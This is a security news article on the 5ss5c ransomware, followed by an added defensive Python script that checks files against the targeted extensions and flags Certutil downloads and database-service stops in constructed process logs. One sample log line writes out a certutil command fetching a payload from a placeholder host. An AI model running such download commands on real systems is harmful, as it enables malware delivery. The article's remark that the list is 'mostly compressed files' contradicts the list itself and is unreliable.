A new ransomware strain dubbed 5ss5c encrypts only certain file types and stops database-related services and processes.
5ss5c ransomware is believed to have been developed by the threat actors behind the Satan, DBGer, Lucky and Iron ransomware families.
The threat actors are actively developing the ransomware; last April they added EternalBlue exploit functionality to it.
Blaze Security believes that 5ss5c has been active since at least November 2019 and that the ransomware is still in development.
The ransomware includes downloader and spreader modules. It uses Certutil to check whether the download succeeded.
5ss5c shares several artefacts, as well as tactics, techniques and procedures, with Satan; compared to Satan, 5ss5c uses multiple packers to protect its droppers and payloads.
It downloads the following tools:
- Spreader (EternalBlue and hardcoded credentials);
- Mimikatz and what appears to be another password dumper/stealer;
- The actual ransomware.
How the Ransomware Operates
The ransomware contains a scanning module, ‘SSSS_Scan’, and an encryption module, ‘5ss5c_CRYPT’. It carries an exception list of files and folders it avoids encrypting, and it stops any database processes it finds running.
It encrypts only files with the following extensions, mostly compressed files:
7z, bak, cer, csv, db, dbf, dmp, docx, eps, ldf, mdb, mdf, myd, myi, ora, pdf, pem, pfx, ppt, pptx, psd, rar, rtf, sql, tar, txt, vdi, vmdk, vmx, xls, xlsx, zip
Once encryption completes, it creates a text file with a Chinese name, translated as “How to decrypt my file_.txt”; the ransom note is also written in Chinese.
The new 5ss5c ransomware is likely to replace Satan, but it still needs further enhancements.
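The two behaviours the article describes that a defender can act on are the fixed extension list (which files are in scope for encryption) and the observable pre-encryption activity (Certutil used to verify a download, database services and processes being stopped). The script below is an added example written for this page, not code from the article or from any vendor analysis: the first half turns the article's extension list into an exposure check over a file inventory, and the second half runs a simple behavioural classifier over constructed process-creation log lines. The Certutil switches and the database service names it looks for are assumptions chosen for illustration; the article names neither.

```python
import re
from pathlib import PureWindowsPath

# Extensions the article lists as the only ones 5ss5c encrypts.
TARGETED_EXTENSIONS = frozenset("""
7z bak cer csv db dbf dmp docx eps ldf mdb mdf myd myi ora pdf pem pfx
ppt pptx psd rar rtf sql tar txt vdi vmdk vmx xls xlsx zip
""".split())


def is_targeted(path: str) -> bool:
    """True if the file's final extension is one the article says 5ss5c encrypts."""
    # PureWindowsPath handles both backslash and forward-slash separators.
    return PureWindowsPath(path).suffix.lower().lstrip(".") in TARGETED_EXTENSIONS


def exposure_report(paths):
    """Split a file inventory into files in scope for this strain and files it would skip."""
    targeted = sorted(p for p in paths if is_targeted(p))
    skipped = sorted(p for p in paths if not is_targeted(p))
    return {"targeted": targeted, "not_targeted": skipped}


# Substrings that identify common database services/processes in a command line.
# Assumption for the example: the article says database processes are stopped
# but does not name which ones.
DB_SERVICE_HINTS = ("mssql", "sqlserver", "mysql", "oracle", "postgres")

# Certutil switches commonly seen when it is used to fetch or verify a file.
# Assumption for the example: the article only says Certutil verifies the download.
CERTUTIL_SWITCHES = ("-urlcache", "-hashfile", "-decode")


def classify_event(command_line: str) -> list:
    """Return the article-described behaviours visible in one command line."""
    cl = command_line.lower()
    findings = []
    if "certutil" in cl and any(sw in cl for sw in CERTUTIL_SWITCHES):
        findings.append("certutil download/verify usage")
    if re.search(r"\b(net\s+stop|sc\s+stop|taskkill)\b", cl) and any(
        hint in cl for hint in DB_SERVICE_HINTS
    ):
        findings.append("database service/process stop")
    return findings


def scan_process_log(lines):
    """Return (line_number, findings) for every log line that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        findings = classify_event(line)
        if findings:
            hits.append((number, findings))
    return hits


# Constructed sample process-creation log lines (not real telemetry).
SAMPLE_LOG = [
    "2020-01-15 10:01:02 host01 CommandLine: certutil.exe -urlcache -split -f "
    "http://example.invalid/payload.bin c:\\temp\\p.bin",
    "2020-01-15 10:01:05 host01 CommandLine: certutil.exe -hashfile c:\\temp\\p.bin MD5",
    "2020-01-15 10:01:09 host01 CommandLine: net stop MSSQLSERVER",
    "2020-01-15 10:02:00 host01 CommandLine: notepad.exe c:\\users\\a\\notes.txt",
]

# Constructed file inventory to illustrate the exposure check.
SAMPLE_FILES = [
    "C:\\data\\backup.BAK",
    "C:\\data\\archive.tar.gz",
    "C:\\data\\report.docx",
    "C:\\data\\tool.exe",
]

if __name__ == "__main__":
    for number, findings in scan_process_log(SAMPLE_LOG):
        print(f"log line {number}: {', '.join(findings)}")
    print(exposure_report(SAMPLE_FILES))
```

Note that the extension check uses only the final suffix, so `archive.tar.gz` is reported as out of scope even though `tar` is on the list; that mirrors a literal reading of the article's list rather than a claim about how the malware parses names. Running the script prints the three matching log lines and the split inventory.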